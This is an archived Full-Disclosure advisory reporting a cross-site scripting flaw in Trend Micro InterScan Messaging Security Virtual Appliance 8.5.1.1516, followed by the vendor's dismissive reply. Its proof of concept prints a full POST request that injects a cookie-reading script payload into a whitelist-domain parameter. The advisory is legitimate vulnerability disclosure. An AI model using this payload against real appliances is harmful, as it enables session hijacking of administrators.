lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAOmMdVs8T15nwk1maZn9sK5KbYKb_gut5A8o=JKoOUR+LFAZFw@mail.gmail.com>
Date: Thu, 29 May 2014 12:55:03 -0300
From: William Costa <william.costa@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] XSS Attacks vulnerability in InterScan Messaging Security
 Virtual Appliance 8.5.1.1516 (Zero-DAY)

I. VULNERABILITY
-------------------------

XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance
8.5.1.1516

II. DESCRIPTION
-------------------------
Has been detected a XSS vulnerability in InterScan Messaging Security
Virtual Appliance version 8.5.1.1516.
The code injection is done through the parameter "addWhiteListDomainStr"
send via post in the page “/addWhiteListDomain.imss”

III. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter
“addWhiteListDomainStr” correctly.


https://10.200.210.100:8445/addWhiteListDomain.imss

Host=10.200.210.100:8445
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0)
Gecko/20100101 Firefox/29.0
Accept=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate Referer=
https://186.230.33.160/trend-interscan/trend.php
Cookie=JSESSIONID=68D4F0AEF4874173BDE77FAA4895231F; CurrentLocale=en- US;
PHPSESSID=2ok068gfak8np5isbe5k5l4nf3; un=7164ceee6266e893181da6c33936e4a4;
userID=1; LANG=en;
wids=modImsvaSystemUseageWidget,modImsvaMailsQueueWidget,modImsvaQuara
ntineWidget,modImsvaArchiveWidget,; lastID=15; theme=default; lastTab=1;
GetPageTab=1
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=95
POSTDATA=addWhiteListDomainStr=aaaa.com"><script>alert(document.cookie
);</script>)


https://vimeo.com/96757096


IV. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, that allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser allowing session
hijacking.

V. SYSTEMS AFFECTED
-------------------------
Tested in InterScan Messaging Security Virtual Appliance 8.5.1.1516

VI. SOLUTION
------------------------

Answer from Trend.

Hi William,


According to our Product Developers, this is not vulnerability of our
product. All of the cookies(not just IMSVA) can be stolen from a
compromised environment. It was highly suggested that you upgrade your
client to ensure safety.
Also, they recommended another Trend Micro Product  -"OfficeScan" that may
be suitable for your environment.

I hope this information helps. Please let me know if you have additional
questions or clarifications.

Have a great day!



By William Costa

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ